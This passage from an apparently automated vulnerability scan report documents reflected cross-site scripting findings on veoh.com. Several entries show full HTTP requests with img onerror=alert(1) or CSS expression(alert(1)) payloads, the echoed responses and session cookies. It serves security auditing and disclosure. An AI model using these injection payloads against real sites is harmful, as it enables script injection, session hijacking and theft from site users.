Vary: Accept-Encoding
Content-Length: 4472
Date: Thu, 03 Feb 2011 21:47:01 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=51

<div class="categories categories-9" id="categories-groupsba32a"><img src=a onerror=alert(1)>a3be2b20567">
<ul><li class="column1"><a href="/browse/groupsba32a%22%3E%3Cimg+src%3Da+onerror%3Dalert
...[SNIP]...

3.459. http://www.veoh.com/category/list/tab/home [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /category/list/tab/home

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 254d4"><img%20src%3da%20onerror%3dalert(1)>329c969f72e was submitted in the REST URL parameter 4. This input was echoed as 254d4"><img src=a onerror=alert(1)>329c969f72e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/list/tab/home254d4"><img%20src%3da%20onerror%3dalert(1)>329c969f72e HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Length: 4420
Date: Thu, 03 Feb 2011 21:46:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=91

<div class="categories categories-9" id="categories-home254d4"><img src=a onerror=alert(1)>329c969f72e">
<ul><li class="column1"><a href="/browse/home254d4%22%3E%3Cimg+src%3Da+onerror%3Dalert%281
...[SNIP]...

3.460. http://www.veoh.com/category/list/tab/movies [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /category/list/tab/movies

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3604"><img%20src%3da%20onerror%3dalert(1)>53d97fb589d was submitted in the REST URL parameter 4. This input was echoed as d3604"><img src=a onerror=alert(1)>53d97fb589d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/list/tab/moviesd3604"><img%20src%3da%20onerror%3dalert(1)>53d97fb589d HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Length: 4472
Date: Thu, 03 Feb 2011 21:46:45 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=34

<div class="categories categories-9" id="categories-moviesd3604"><img src=a onerror=alert(1)>53d97fb589d">
<ul><li class="column1"><a href="/browse/moviesd3604%22%3E%3Cimg+src%3Da+onerror%3Dalert
...[SNIP]...

3.461. http://www.veoh.com/category/list/tab/music [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /category/list/tab/music

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32244"><img%20src%3da%20onerror%3dalert(1)>f5bcaf4b0ea was submitted in the REST URL parameter 4. This input was echoed as 32244"><img src=a onerror=alert(1)>f5bcaf4b0ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/list/tab/music32244"><img%20src%3da%20onerror%3dalert(1)>f5bcaf4b0ea HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Length: 4446
Date: Thu, 03 Feb 2011 21:46:52 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=99

<div class="categories categories-9" id="categories-music32244"><img src=a onerror=alert(1)>f5bcaf4b0ea">
<ul><li class="column1"><a href="/browse/music32244%22%3E%3Cimg+src%3Da+onerror%3Dalert%2
...[SNIP]...

3.462. http://www.veoh.com/category/list/tab/tvshows [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /category/list/tab/tvshows

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21de1"><img%20src%3da%20onerror%3dalert(1)>a2d080657a4 was submitted in the REST URL parameter 4. This input was echoed as 21de1"><img src=a onerror=alert(1)>a2d080657a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/list/tab/tvshows21de1"><img%20src%3da%20onerror%3dalert(1)>a2d080657a4 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Length: 4498
Date: Thu, 03 Feb 2011 21:46:41 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=49

<div class="categories categories-9" id="categories-tvshows21de1"><img src=a onerror=alert(1)>a2d080657a4">
<ul><li class="column1"><a href="/browse/tvshows21de1%22%3E%3Cimg+src%3Da+onerror%3Dale
...[SNIP]...

3.463. http://www.veoh.com/category/list/tab/videos [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /category/list/tab/videos

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97565"><img%20src%3da%20onerror%3dalert(1)>386056b84fa was submitted in the REST URL parameter 4. This input was echoed as 97565"><img src=a onerror=alert(1)>386056b84fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/list/tab/videos97565"><img%20src%3da%20onerror%3dalert(1)>386056b84fa HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Length: 4472
Date: Thu, 03 Feb 2011 21:46:41 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=90

<div class="categories categories-9" id="categories-videos97565"><img src=a onerror=alert(1)>386056b84fa">
<ul><li class="column1"><a href="/browse/videos97565%22%3E%3Cimg+src%3Da+onerror%3Dalert
...[SNIP]...

3.464. http://www.veoh.com/category/list/tab/webseries [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /category/list/tab/webseries

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac136"><img%20src%3da%20onerror%3dalert(1)>223b61dcbe7 was submitted in the REST URL parameter 4. This input was echoed as ac136"><img src=a onerror=alert(1)>223b61dcbe7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /category/list/tab/webseriesac136"><img%20src%3da%20onerror%3dalert(1)>223b61dcbe7 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Length: 4550
Date: Thu, 03 Feb 2011 21:46:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=81

<div class="categories categories-9" id="categories-webseriesac136"><img src=a onerror=alert(1)>223b61dcbe7">
<ul><li class="column1"><a href="/browse/webseriesac136%22%3E%3Cimg+src%3Da+onerror%3
...[SNIP]...

3.465. http://www.veoh.com/download/index/permalinkId/v18978294NGnK88j8 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /download/index/permalinkId/v18978294NGnK88j8

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2a30"style%3d"x%3aexpression(alert(1))"fc975c07eb6 was submitted in the REST URL parameter 4. This input was echoed as b2a30"style="x:expression(alert(1))"fc975c07eb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /download/index/permalinkId/v18978294NGnK88j8b2a30"style%3d"x%3aexpression(alert(1))"fc975c07eb6 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:21 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=60
Content-Length: 26859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="thumb_browse_1" href="/browse/videos/category//watch/v18978294NGnK88j8b2a30"style="x:expression(alert(1))"fc975c07eb6" title="" class="thumb thumbLink" onclick="">
...[SNIP]...

3.466. http://www.veoh.com/search/videos/q/-MENUVALUE- [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /search/videos/q/-MENUVALUE-

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ce5ce<img%20src%3da%20onerror%3dalert(1)>c10905c976b was submitted in the REST URL parameter 4. This input was echoed as ce5ce<img src=a onerror=alert(1)>c10905c976b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/videos/q/-MENUVALUE-ce5ce<img%20src%3da%20onerror%3dalert(1)>c10905c976b HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:49:08 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=67
Content-Length: 59484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"search","kw":"-MENUVALUE-ce5ce<img src=a onerror=alert(1)>c10905c976b","mature":"false","sortBy":"mostrelevant","bcategory":"category_"}</textarea>
...[SNIP]...

3.467. http://www.veoh.com/search/videos/q/-MENUVALUE- [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /search/videos/q/-MENUVALUE-

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc326"><img%20src%3da%20onerror%3dalert(1)>67cf1c4032e was submitted in the REST URL parameter 4. This input was echoed as cc326"><img src=a onerror=alert(1)>67cf1c4032e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/videos/q/-MENUVALUE-cc326"><img%20src%3da%20onerror%3dalert(1)>67cf1c4032e HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:48:43 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=98
Content-Length: 59675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/search/videos/q/-MENUVALUE-cc326"><img src=a onerror=alert(1)>67cf1c4032e" selected="selected">
...[SNIP]...

3.468. http://www.veoh.com/search/videos/q/publisher:bunny12344 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /search/videos/q/publisher:bunny12344

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14861"><img%20src%3da%20onerror%3dalert(1)>93bdcf942a3 was submitted in the REST URL parameter 4. This input was echoed as 14861"><img src=a onerror=alert(1)>93bdcf942a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/videos/q/publisher:bunny1234414861"><img%20src%3da%20onerror%3dalert(1)>93bdcf942a3 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:48:59 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=78
Content-Length: 60152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/search/videos/q/publisher:bunny1234414861"><img src=a onerror=alert(1)>93bdcf942a3" selected="selected">
...[SNIP]...

3.469. http://www.veoh.com/search/videos/q/publisher:bunny12344 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /search/videos/q/publisher:bunny12344

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e34d7<img%20src%3da%20onerror%3dalert(1)>3d0b8bddcb4 was submitted in the REST URL parameter 4. This input was echoed as e34d7<img src=a onerror=alert(1)>3d0b8bddcb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/videos/q/publisher:bunny12344e34d7<img%20src%3da%20onerror%3dalert(1)>3d0b8bddcb4 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:49:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=62
Content-Length: 59961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"search","kw":"publisher:bunny12344e34d7<img src=a onerror=alert(1)>3d0b8bddcb4","mature":"false","sortBy":"mostrelevant","bcategory":"category_"}</textarea>
...[SNIP]...

3.470. http://www.veoh.com/video/flag/permalinkId/v18978294NGnK88j8 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /video/flag/permalinkId/v18978294NGnK88j8

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a041"style%3d"x%3aexpression(alert(1))"ad20725130b was submitted in the REST URL parameter 4. This input was echoed as 1a041"style="x:expression(alert(1))"ad20725130b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /video/flag/permalinkId/v18978294NGnK88j81a041"style%3d"x%3aexpression(alert(1))"ad20725130b HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:28 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=88
Content-Length: 32282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
